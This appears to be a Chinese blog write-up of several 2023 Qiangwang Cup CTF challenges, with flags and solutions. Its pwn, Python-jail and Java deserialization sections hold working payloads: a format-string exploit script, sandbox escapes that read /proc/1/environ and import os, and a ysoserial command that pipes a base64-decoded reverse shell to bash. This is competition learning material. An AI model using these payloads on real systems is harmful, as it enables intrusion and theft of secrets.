2023年第七届强网杯部分WP

最新推荐文章于 2024-05-15 07:16:20 发布
最新推荐文章于 2024-05-15 07:16:20 发布
阅读量2.6k 收藏 37
点赞数 24
文章标签: 安全 经验分享 笔记
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_65165505/article/details/135044734
版权

一.SpeedUp

在这个网站直接记载了2的27次方的阶乘的每一位数字之和

A244060 - OEIS

对4495662081取个sha256即可 

flag{bbdee5c548fddfc76617c562952a3a3b03d423985c095521a8661d248fad3797}

二.谍影重重2.0

将数据包导出为json格式


使用脚本提取字段并进行MD5

import json
import pyModeS as pms
import hashlib

with open('123.json', 'r', encoding='utf-8') as file:
    data = json.load(file)

info = []
for packet in data:
    if 'layers' in packet['_source'] and 'tcp' in packet['_source']['layers']:
        tcp_layer = packet['_source']['layers']['tcp']

        if 'tcp.payload' in tcp_layer:
            tcp_payload = tcp_layer['tcp.payload'].replace(':','')
            info.append(tcp_payload)

planes_data = []

for i in info:
    msg = i[18:]
    if pms.adsb.typecode(msg) >= 19 and pms.adsb.typecode(msg) <= 22:
        icao = pms.adsb.icao(msg)
        velocity_info = pms.adsb.velocity(msg)
        speed, track, vertical_rate, _ = velocity_info

        plane_info = {"icao": icao, "speed": speed, "track": track, "vertical_rate": vertical_rate}
        planes_data.append(plane_info)

fastest_plane = max(planes_data, key=lambda x: x['speed'])
print(hashlib.md5(fastest_plane['icao'].upper().encode()).hexdigest())

请无视报错,pycharm被我搞得有点坏 

三.Pyjail ! It's myFILTER !!!

使用nc连接,发现有很多代码

审计发现漏洞-非预期读环境变量 

使用payload

{print(open("/proc/1/environ").read())}

四.Ez_fmt

脚本如下

from pwn import *
context(os='linux', arch='amd64', log_level='debug')
#p = process('./ez_fmt')
p = remote('ip', port)
elf = ELF('./ez_fmt')
libc = ELF('./libc-2.31.so')

p.recvuntil("0x")
stack=int(p.recv(12),16)
print(hex(stack))
pay=b'%4589c%11$hn%19$p'.ljust(0x28,b'\x00')+p64(stack-8)
p.send(pay)

p.recvuntil("0x")
libc_base=int(p.recv(12),16)-libc.sym['__libc_start_main']-243
print(hex(libc_base))

one_gadget=libc_base+0xe3b01
p.recvuntil("\n")
pay=(b'%'+str(one_gadget&0xffff).encode()+b'c%10$hn'+b'%'+str(((one_gadget>>16)&0xffff)-(one_gadget&0xffff)).encode()+b'c%11$hn').ljust(0x20,b'\x00')+p64(stack+0x68)+p64(stack+0x68+2)
p.send(pay)

p.interactive()

五.babyre

发现有tls反调试

 tea族算法解密 

#include <stdio.h>
#include <stdint.h>





void jiemi(uint32_t v[2], uint32_t const key[4]) {
    unsigned int i,j;
    uint32_t v0=v[0], v1=v[1], delta=0x88408067, sum=0xd192c263;
    for(i=0;i<4;i++) {
        for (j=0; j<33; j++) {
            sum -= delta;
            v1 -= (((v0 << 5) ^ (v0 >> 4)) + v0) ^ (sum + key[(sum>>11) & 3]);
            v0 -= (((v1 << 5) ^ (v1 >> 4)) + v1) ^ (sum + key[sum & 3]) ^sum;
        }
    }
    v[0]=v0; v[1]=v1;
}

int main()
{
    uint32_t array[8] = {0x9523F2E0, 0x8ED8C293, 0x8668C393, 0xDDF250BC, 0x510E4499, 0x8C60BD44, 0x34DCABF2, 0xC10FD260};
    uint32_t  key[4]={0x62, 0x6F, 0x6D, 0x62};
    for (int i = 0; i < 8; i += 2) {  
        uint32_t temp[2];  
        temp[0] = array[i];  
        temp[1] = array[i + 1];  
        jiemi(temp, key);  

        printf("%c%c%c%c%c%c%c%c",  
           (char)(temp[0] >> 0), (char)(temp[0] >> 8), (char)(temp[0] >> 16), (char)(temp[0] >> 24),  
           (char)(temp[1] >> 0), (char)(temp[1] >> 8), (char)(temp[1] >> 16), (char)(temp[1] >> 24));  
    }
    return 0;
}

六.Pyjail ! It's myRevenge

使用nc连接,依次进行如下操作

{globals().update(dict(my_filter=lambda x:1))}''{in''put()}'#
{globals().update(dict(len=lambda x:0))}''{in''put()}'#
{print("".__class__.__mro__[1].__subclasses__()[137].__init__.__globals__["__builtins__"]["__import__"]("os").listdir())}
['flag_26F574F8CEE82D06FEDC45CF5916B86A732DD326CE1CB2C9A96751E072D0A104', 'server_8F6C72124774022B.py']

{globals().update(dict(my_filter=lambda x:1))}''{in' 'put()}'# 
{globals(). update(dict(len=lambda x:0))}''{in' 'put()}'#
{print (open("flag_26F574F8CEE82D06FEDC45CF5916B86A732DD326CE1CB2C9A96751E072D0A104"). read())}

七.石头剪刀布

按照如下顺序即可获胜

0000011220120220110111222010022012110021012012202100112022100112110020110220210201

八.happygame

使用ysoserial-all.jar工具

java -jar ysoserial-all.jar CommonsCollections5 'bash -c {echo,xxxxx}|{base64,-d}|{bash,-i}'|base64

其中xxxx为反弹shell的base64编码

可以使用在线网站生成反弹shell的指令

[~]#棱角 ::Edge.Forum*

 打开postman,使用grpc协议,填写ip,端口,选择ProcessMsg接口

 invoke之后即可反弹shell

九.调查问卷

不用多说了吧

 十.签到

Dream ZHO
关注
  • 24
    点赞
  • 37
    收藏
    觉得还不错? 一键收藏
  • 3
    评论
2023强网杯wp-强网先锋
若谷的博客
12-19 885
2023强网杯
强网杯 WriteUp By Nu1L
08-02
2022第六届“强网杯”全国网络安全挑战赛
2022第三届“网鼎杯”网络安全大赛(青龙组)部分题目附件
09-19
2022第三届“网鼎杯”网络安全大赛(青龙组)部分题目附件 2022第三届“网鼎杯”网络安全大赛(青龙组)部分题目附件 2022第三届“网鼎杯”网络安全大赛(青龙组)部分题目附件 2022第三届“网鼎杯”网络安全大赛(青龙组)部分题目附件 2022第三届“网鼎杯”网络安全大赛(青龙组)部分题目附件 2022第三届“网鼎杯”网络安全大赛(青龙组)部分题目附件 2022第三届“网鼎杯”网络安全大赛(青龙组)部分题目附件 2022第三届“网鼎杯”网络安全大赛(青龙组)部分题目附件 2022第三届“网鼎杯”网络安全大赛(青龙组)部分题目附件 2022第三届“网鼎杯”网络安全大赛(青龙组)部分题目附件 2022第三届“网鼎杯”网络安全大赛(青龙组)部分题目附件 2022第三届“网鼎杯”网络安全大赛(青龙组)部分题目附件 2022第三届“网鼎杯”网络安全大赛(青龙组)部分题目附件 2022第三届“网鼎杯”网络安全大赛(青龙组)部分题目附件 2022第三届“网鼎杯”网络安全大赛(青龙组)部分题目附件 2022第三届“网鼎杯”网络安全大赛(青龙组)部分题目附件
[ CTF ]【天格】战队WriteUp-第七届强网杯”全国安全挑战赛
wangluoanquan111的博客
01-24 1009
只有当用户的输入满足所有的条件(不包含大括号,只包含ASCII字符,不包含黑名单中的关键词,长度小于65,且不包含"eval")时,输入的代码才会被执行。在这个循环和语句中,根据v16的值,程序会执行不同的操作,包括调用一些未在这段代码中定义的函数(如sub_401980、sub_401D10等)、改变v16的值、改变其他变量的值等。第二种是自学,就是在网上找资源、找教程,或者是想办法认识一-些大佬,抱紧大腿,不过这种方法很耗时间,而且学习没有规划,可能很长一段时间感觉自己没有进步,容易劝退。
2023强网杯——Reverse——ezre
于高山之巅,方见大河奔涌;于群峰之上,更觉长风浩荡。
12-21 476
此处找到了SM4解密的特征_SM4_FK。在sub_3580函数中找到了密钥和密文。直接用cyberchef进行解密。
2023第七届强网杯初赛 WP
渗透测试研究中心
12-22 1967
最坏情况下,前5次全输,需要87步即可达到260分,即第92轮时,因此可以通过本题。利用SQL注入修改data数据的值,本题data是数组,且会插入数据库,最终的payload需要改一下让前后闭合,且TP5,在网上找一个链子的EXP改一下。当然,前一题的SQL注入点依然存在,不过依然需要鉴权进入后台,这意味着,只需要我们能进入后台,就能通过load_file的方式读取flag。简单来说,就是能set任意的值,例如下方的payload,就能注入一个snowwolf的键,且值为wolf,4代表数据长度。
2022第六届强网杯部分wp
mxx307的博客
08-01 3007
2022第六届强网杯部分wp
2022强网杯WP
CK_0ff的博客
08-08 2613
2022强网杯WP
第六届“强网杯”青少专项赛 writewp by 楠辞姐姐后援团
JEWSWS的博客
09-11 2410
这次比赛难度很大,Crypto部分也全都是猜谜语类型的题目,没啥游戏体验,不过好在排名在前30.本篇WP为团队WP,团队成员为:树木,AcexZe,Lenyi战队名称:楠辞姐姐后援团战队排名:24。
2023江西省工业互联网大赛WP
12-25
2023江西省工业互联网大赛WP
【电子取证】网站取证(第六届”蓝帽杯“全国大学生网络安全技能大赛)
07-12
第六届”蓝帽杯“全国大学生网络安全技能大赛
2020 第二届网鼎杯 boom wp
01-20
2020 第二届网鼎杯 boom wp ​ ​ 卑微新手在线答题。。。。。 第二届网鼎杯-boom 下载附件得到一个boom.exe程序 打开是这样 根据提示继续 得到一串md5 加密的数据,使用在线解密 https://www.somd5.com/ 得到第...
广东省强网杯2015 writeup
LiuzhuoGump的专栏
12-13 1万+
第一次参加这么正式的安全比赛,拖了有点久,现在把比赛时候的一些想法和思路记录下来。 从web狗的角度来看资格赛关于web的题目不算是很难,pwn和re的题就不评论了。 1.常用的管理员密码: 试了好几个,最后提交admin通过 2.单身狗: 二维码的一部分被doge挡住了,直接修复下然后扫一下即可得出flag,送分题 3.回旋13踢: ROT13
Android 开源项目和文章集合(更新:2022.03.21)
热门推荐
z979451341的博客
11-08 13万+
1.再见SharedPreferences,你好MMKV! https://mp.weixin.qq.com/s/VBMDIE0QHXQAMuIjon-Fjg
[2023 强网杯qwb]ThinkShop
GKD2019的博客
12-22 1052
[2023 强网杯初赛]ThinkShop shopping 反序列化 sql注入 qwb 强网杯 2023
2023强网杯——强网先锋——SpeedUp
于高山之巅,方见大河奔涌;于群峰之上,更觉长风浩荡。
12-21 562
在OEIS上查询,得到了这组数列,直接得到2的27次方的值是4495662081,对其进行sha256加密就可以得到flag。这个题目要求的是2的27次方的阶乘中的每一位数的和。算出2的1到n次方的阶乘的每位数字和,得到一个数列。
[强网杯2023] 只作了几个小题
weixin_52640415的博客
12-17 2121
格式化字符串 %nc%*d$d%k$n
守护长者安全,平安养老险携手福海街道开展防灾减灾活动
最新发布
NewsMash的博客
05-15 133
展望未来,平安养老险深圳分公司将持续与更多养老社区携手开展系列活动,合计赠送1000份灭火袋,并推出更多关爱老人的举措,以实际行动为构建安全、和谐的养老环境贡献力量,为老人的金色晚添上温暖色彩,让他们的生活更加安心、舒心。老人们在台下听的投入,并在互动环节踊跃提问。作为平安集团服务养老、保障民生的重要“窗口”,平安养老险始终坚持金融工作的政治性、人民性,以满足人民日益增长的美好生活需要作为高质量发展的出发点和落脚点,公司期待与更多关心老人福祉的人士携手,共筑“老有所养、老有所依”的中国梦。
强网杯 2022 谍影重重wp
12-18
强网杯2022谍影重重WP是我国一项网络安全竞赛中的一个题目解答。这道题目主要涉及隐写和密码学方面的知识,要求选手解析一段加密信息,并还原出明文信息。 解题过程如下: 首先,选手会得到一段看似普通的文本,但其中隐藏着隐藏着几个不同类型的隐藏信息。选手需要借助隐写分析工具,例如StegSolve,来分析图像中是否含有LSB隐写、色彩分量隐写等信息。此外,选手还要注意文字中是否有使用不常见的Unicode字符来隐藏信息。 在找到隐写信息后,接下来是解密密码学部分。选手需要根据提示,使用正确的解密方法对隐藏信息进行还原。可能涉及到的密码学算法有:凯撒密码、栅栏密码、维吉尼亚密码等。需要选手根据密钥或者加密规则,反推出正确的解密方法,并对隐藏信息进行解码。 通过以上步骤,选手最终可以得到明文信息,也就是这道题目的答案。 这道题目整体难度较高,需要选手具备扎实的密码学和隐写学知识,并具有分析和解决问题的能力。参赛选手需要细心观察、耐心分析,才能顺利解答出这个谜题。同时,这道题目也展示了网络安全竞赛中的一种常见挑战方式,旨在培养选手的思维敏捷性和解决复杂问题的能力。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值